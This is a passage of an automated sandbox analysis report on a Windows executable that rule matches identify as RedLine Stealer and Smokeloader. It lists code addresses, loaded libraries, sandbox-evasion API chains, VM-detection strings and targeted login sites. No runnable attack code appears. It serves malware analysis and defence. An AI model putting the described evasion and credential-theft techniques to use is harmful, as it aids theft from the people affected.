                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0043D8D00_2_0043D8D0
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0041E0830_2_0041E083
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0044915B0_2_0044915B
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0045D15A0_2_0045D15A
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0041316D0_2_0041316D
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0040112C0_2_0040112C
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004279E00_2_004279E0
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0041D1E90_2_0041D1E9
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004109FC0_2_004109FC
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0040D9940_2_0040D994
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0044F2440_2_0044F244
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0041AA490_2_0041AA49
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0041B2510_2_0041B251
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00429A5B0_2_00429A5B
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004102180_2_00410218
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00410A330_2_00410A33
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00414A830_2_00414A83
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0044234A0_2_0044234A
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0040136E0_2_0040136E
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00457B300_2_00457B30
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004283340_2_00428334
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0041EBEB0_2_0041EBEB
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00415C7E0_2_00415C7E
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004184130_2_00418413
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0043A4FE0_2_0043A4FE
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00424C8D0_2_00424C8D
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0043BCA40_2_0043BCA4
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004165480_2_00416548
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004395350_2_00439535
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0041764A0_2_0041764A
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0043D6000_2_0043D600
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004126B90_2_004126B9
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004297300_2_00429730
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00434FAC0_2_00434FAC
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009C908F0_2_009C908F
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009BD8BF0_2_009BD8BF
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009A78B10_2_009A78B1
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009C10D30_2_009C10D3
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009CD8670_2_009CD867
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009B99970_2_009B9997
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009A29200_2_009A2920
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0099BA830_2_0099BA83
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009D12BE0_2_009D12BE
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009A22B40_2_009A22B4
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009B9ADA0_2_009B9ADA
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009A52D70_2_009A52D7
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009AE2EA0_2_009AE2EA
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009C42E70_2_009C42E7
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009C52130_2_009C5213
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009BD2210_2_009BD221
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009D8A670_2_009D8A67
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0099B3900_2_0099B390
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0099AB8F0_2_0099AB8F
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0099E3B50_2_0099E3B5
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009A33D40_2_009A33D4
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009ED3C10_2_009ED3C1
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009D93C20_2_009D93C2
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0099DBFB0_2_0099DBFB
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009C03F50_2_009C03F5
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009CDB370_2_009CDB37
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009BC3410_2_009BC341
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009C048F0_2_009C048F
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009AB4B80_2_009AB4B8
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009AACB00_2_009AACB0
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009DF4AB0_2_009DF4AB
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009BF4DF0_2_009BF4DF
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009AC4D70_2_009AC4D7
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009B9CC20_2_009B9CC2
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00996C080_2_00996C08
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009AFC0B0_2_009AFC0B
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009BBC2C0_2_009BBC2C
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009AD4500_2_009AD450
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009B7C470_2_009B7C47
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009A047F0_2_009A047F
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009964720_2_00996472
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009B859B0_2_009B859B
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009D25B10_2_009D25B1
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009BA5D40_2_009BA5D4
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009CB5C90_2_009CB5C9
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00995D110_2_00995D11
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009955400_2_00995540
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009C6D430_2_009C6D43
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009B4EF40_2_009B4EF4
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009B9EE20_2_009B9EE2
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009A5EE50_2_009A5EE5
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009AEE520_2_009AEE52
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009A867A0_2_009A867A
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009C979C0_2_009C979C
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009A67AF0_2_009A67AF
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009BAFE90_2_009BAFE9
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009CBF0B0_2_009CBF0B
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009CA7650_2_009CA765
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeProcess token adjusted: Load DriverJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: String function: 00438E28 appears 39 times
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: String function: 0043D070 appears 51 times
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: String function: 0040E14E appears 52 times
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: String function: 0099E3B5 appears 36 times
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: String function: 004360E1 appears 144 times
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: String function: 0099A905 appears 38 times
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: String function: 009CD2D7 appears 50 times
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2052 -s 1564
                    Source: Vd3tOP5WSD.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.3920154401.0000000000A38000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@0/1
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00A3971E CreateToolhelp32Snapshot,Module32First,0_2_00A3971E
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2052
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\49887bfa-5371-4d1b-a640-bf5fc044d4ceJump to behavior
                    Source: Vd3tOP5WSD.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeSystem information queried: HandleInformationJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2623583743.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002EDE000.00000004.00000020.00020000.00000000.sdmp, Vd3tOP5WSD.exe, 00000000.00000002.3920570857.00000000029A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Vd3tOP5WSD.exeReversingLabs: Detection: 89%
                    Source: unknownProcess created: C:\Users\user\Desktop\Vd3tOP5WSD.exe "C:\Users\user\Desktop\Vd3tOP5WSD.exe"
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2052 -s 1564
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeSection loaded: fltlib.dllJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeSection loaded: my-global-render.dllJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeUnpacked PE file: 0.2.Vd3tOP5WSD.exe.400000.0.unpack .text:ER;.data:W;.sic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeUnpacked PE file: 0.2.Vd3tOP5WSD.exe.400000.0.unpack
                    Source: Vd3tOP5WSD.exeStatic PE information: section name: .sic
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00464074 push B000468Ch; retn 0044h0_2_00464079
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00463CAD push esi; ret 0_2_00463CB6
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00403D6C push eax; mov dword ptr [esp], 00000000h0_2_00403D71
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00452768 push ecx; ret 0_2_0045277B
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009E29CF push ecx; ret 0_2_009E29E2
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00993FD3 push eax; mov dword ptr [esp], 00000000h0_2_00993FD8
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00401FF9 Sleep,ExitProcess,0_2_00401FF9
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00401FF9 Sleep,ExitProcess,0_2_00401FF9
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00992260 Sleep,ExitProcess,0_2_00992260
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeEvasive API call chain: GetComputerName,DecisionNodes,ExitProcessgraph_0-73637
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-73712
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_0-73712
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00429EF7 rdtsc 0_2_00429EF7
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation,0_2_0041F9A4
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-73728
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcessgraph_0-73679
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-73687
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_0-73687
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_0-73679
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00451F08 FindFirstFileExW,0_2_00451F08
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00451FBC FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00451FBC
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009E216F FindFirstFileExW,0_2_009E216F
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009E2223 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_009E2223
                    Source: Amcache.hve.6.drBinary or memory string: VMware
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                    Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3920215054.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, Vd3tOP5WSD.exe, 00000000.00000002.3920570857.0000000002940000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                    Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                    Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                    Source: Vd3tOP5WSD.exe, 00000000.00000003.2714979876.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                    Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
